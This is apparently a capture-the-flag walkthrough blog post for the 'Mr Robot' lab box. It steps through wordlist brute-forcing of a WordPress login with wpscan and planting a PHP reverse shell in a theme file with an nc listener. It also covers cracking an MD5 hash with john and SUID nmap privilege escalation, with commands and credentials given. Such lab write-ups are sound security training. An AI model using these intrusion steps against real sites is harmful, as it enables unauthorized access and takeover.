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Mr Robot CTF

 ·  ☕ 3 min read  ·  ✍️ M4t35Z

Based on the Mr. Robot show, can you root this box?



nmap file
Ports are: 22, 80 and 443


dirsearch file

Further investigation

  • Lets go to /robots.txt
    U can see there is key-1-of-3.txt. Go to /key-1-of-3.txt and u got the first flag.
    U can also see there is a fsocity.dic file. This is a big wordlist. Just save it with wget or curl -LO

  • Just go every link u get in the dirsearch search
    readme :D
    /Image seems to be a blog of user
    /wp-login.php is a wordpress login page

  • Guessing the /wp-login.php username
    Try to guess the username cuz user or admin returns

    ERROR: Invalid username.

    So try elliot cuz this is a 1337 Mr R0b0t room :D

    ERROR: The password you entered for the username elliot is incorrect.

    Ohohooooooo the user is elliot and we have a fsocity.dic file.

  • Cracking the /wp-login.php
    We have to crack elliot profile with fsocity.dic we got earlier.
    Lets shorten this wordlist

    sort -u fsocity.dic > fsocity_sorted.dic

    Now we have the shortened fsocity_sorted.dic

    CR4CK TH1S:

    wpscan --url -P fsocity_sorted.dic -U elliot

    Btw there is the whole wpscan output in case if u need it.
    We got the CREDS!! elliot:ER28-0652

  • Logging in, getting a shell
    So we are in elliot’s profile.
    We have to find an iteresting thing we can use to get a shell.
    We can edit the 404.php file ( Appearance –> Editor –> 404.php )
    Just paste a phpinfo(); in the beggining of the file.
    AAAAANND We got php code execution !!!!
    Now we need a revshell:

    • Go to Pentestmonkey’s php reverse shell on github
    • Copy it and paste it to the 404.php
      Change IP and PORT to yours!
    • Go to /404.php while ur nc listener is set up ( nc -lvnp 1337 )

    We are user daemon

We Are in and we need the second flag!

  • Get a normal shell with
python -c 'import pty; pty.spawn("/bin/bash")'
  • The second flag is in /home/robot/key-2-of-3.txt
    But we cant cat it ):
    If we go /home/robot there is a file called password.raw-md5 and it has the raw md5 hash of robot’s password.
    W3 H4V3 2 Cr4Ck 17

  • Cracking the password.raw-md5

    john password.raw-md5 --format=Raw-MD5 --wordlist=~/tools/wordlists/rockyou.txt

    And we got the password of the robot user. ( robot:abcdefghijklmnopqrstuvwxyz )
    robot’s password

  • Getting the second flag
    Just change user to robot with su robot and u can now cat the flag
    second flag

Privesc to root

  • We have to search for suid executables
find / -perm +6000 2>/dev/null | grep '/bin/'

Oh there is /usr/local/bin/nmap

  • We can run nmap interactively with nmap --interactive
    We are in the nmap shell now. Hit h for help.
    We can see we are able to execute system commands with !
    Just see how we are with !id and then !cat /root/key-3-of-3.txt and we got the flag!
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